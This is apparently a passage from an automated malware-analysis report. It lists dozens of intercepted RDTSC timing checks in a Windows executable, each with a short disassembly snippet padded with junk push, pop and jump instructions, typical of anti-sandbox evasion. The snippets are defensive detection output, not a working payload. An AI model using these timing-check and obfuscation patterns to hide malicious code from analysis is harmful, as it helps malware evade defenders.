Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631790 second address: 6317B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5A147D6A26h 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F5A147D6A26h 0x00000012 jmp 00007F5A147D6A35h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0DE5 second address: 5E0E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F5A14B6C836h 0x00000009 jmp 00007F5A14B6C842h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0E08 second address: 5E0E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0ECD second address: 5E0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0ED2 second address: 5E0ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631A44 second address: 631A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631B9F second address: 631BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631BA5 second address: 631BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631BAB second address: 631BD6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5A147D6A3Ch 0x00000008 jmp 00007F5A147D6A34h 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631BD6 second address: 631BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631BDC second address: 631BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F5A147D6A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F5A147D6A26h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635BE4 second address: 635BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5A14B6C836h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6352DD second address: 6352E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6352E4 second address: 635336 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5A14B6C84Bh 0x00000008 jmp 00007F5A14B6C843h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5A14B6C843h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jnc 00007F5A14B6C836h 0x0000001f je 00007F5A14B6C836h 0x00000025 popad 0x00000026 pushad 0x00000027 jl 00007F5A14B6C836h 0x0000002d push esi 0x0000002e pop esi 0x0000002f js 00007F5A14B6C836h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635622 second address: 635630 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5A147D6A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635630 second address: 635651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C847h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635651 second address: 635663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jl 00007F5A147D6A2Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63590C second address: 635910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635910 second address: 635918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635918 second address: 635935 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5A14B6C843h 0x00000008 je 00007F5A14B6C83Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635935 second address: 63594A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F5A147D6A2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63594A second address: 635970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5A14B6C847h 0x0000000a js 00007F5A14B6C83Eh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63DF3C second address: 63DF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63C293 second address: 63C297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63C297 second address: 63C2C8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5A147D6A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jbe 00007F5A147D6A26h 0x00000011 jmp 00007F5A147D6A36h 0x00000016 pop edx 0x00000017 push ebx 0x00000018 je 00007F5A147D6A26h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63C86E second address: 63C872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63C872 second address: 63C87C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5A147D6A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63C87C second address: 63C882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D0D4 second address: 63D0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A147D6A2Dh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D0EA second address: 63D0F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D0F0 second address: 63D0F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D3E9 second address: 63D3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D998 second address: 63D9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F5A147D6A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63DC65 second address: 63DC7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A14B6C843h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64364D second address: 643652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 643652 second address: 643667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5A14B6C836h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F5A14B6C836h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6469EE second address: 6469F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646CA8 second address: 646CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F5A14B6C83Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646CBE second address: 646CE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A33h 0x00000007 je 00007F5A147D6A38h 0x0000000d jmp 00007F5A147D6A2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646E8A second address: 646E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646E94 second address: 646E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64F6B9 second address: 64F6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5A14B6C836h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F5A14B6C836h 0x00000013 jp 00007F5A14B6C836h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64F6D2 second address: 64F6F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5A147D6A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edx 0x0000000e jmp 00007F5A147D6A33h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64F9DD second address: 64F9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5A14B6C836h 0x0000000a jnc 00007F5A14B6C836h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64FCC2 second address: 64FCC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64FCC7 second address: 64FCDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C844h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650246 second address: 650263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5A147D6A26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5A147D6A2Ah 0x00000012 jng 00007F5A147D6A26h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650263 second address: 650269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650269 second address: 650272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650272 second address: 6502A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F5A14B6C836h 0x0000000c popad 0x0000000d jbe 00007F5A14B6C854h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6502A9 second address: 6502CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6502CA second address: 6502E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5A14B6C840h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6503F9 second address: 6503FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6503FD second address: 65041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C843h 0x00000007 jnp 00007F5A14B6C836h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65041A second address: 65041F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65041F second address: 65042C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F5A14B6C83Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650B87 second address: 650B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A147D6A2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656BD8 second address: 656BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F5A14B6C836h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656D3F second address: 656D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656D4B second address: 656D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A14B6C83Ah 0x00000009 jmp 00007F5A14B6C83Fh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656D6D second address: 656D7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667A43 second address: 667A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667A47 second address: 667A72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5A147D6A30h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 669D12 second address: 669D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 669D18 second address: 669D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 669D1C second address: 669D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B7F7 second address: 66B80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F5A147D6A32h 0x0000000b jp 00007F5A147D6A26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B80A second address: 66B820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F5A14B6C83Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B820 second address: 66B849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F5A147D6A30h 0x0000000d jmp 00007F5A147D6A2Dh 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B849 second address: 66B855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5A14B6C836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B855 second address: 66B874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F5A147D6A33h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B66D second address: 66B671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 671F61 second address: 671F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 671F6B second address: 671F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6735C4 second address: 6735D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5A147D6A26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6735D0 second address: 6735D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67BFE0 second address: 67BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A147D6A2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67DF3D second address: 67DF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67DE13 second address: 67DE18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688440 second address: 688448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688448 second address: 688471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F5A147D6A35h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 ja 00007F5A147D6A26h 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688471 second address: 688476 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688476 second address: 68847C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68870A second address: 68871D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F5A14B6C836h 0x00000009 jnp 00007F5A14B6C836h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68871D second address: 688735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F5A147D6A2Bh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688A30 second address: 688A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5A14B6C836h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688A3B second address: 688A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F5A147D6A36h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688A57 second address: 688A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 688BDD second address: 688BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68D755 second address: 68D765 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F5A14B6C836h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68D765 second address: 68D769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68D769 second address: 68D76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68D76F second address: 68D777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68D2BC second address: 68D2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68D2C2 second address: 68D2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68D2C6 second address: 68D2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A14B6C83Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F5A14B6C836h 0x00000013 jnc 00007F5A14B6C836h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6915BA second address: 6915C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6915C4 second address: 6915C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6915C8 second address: 6915D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
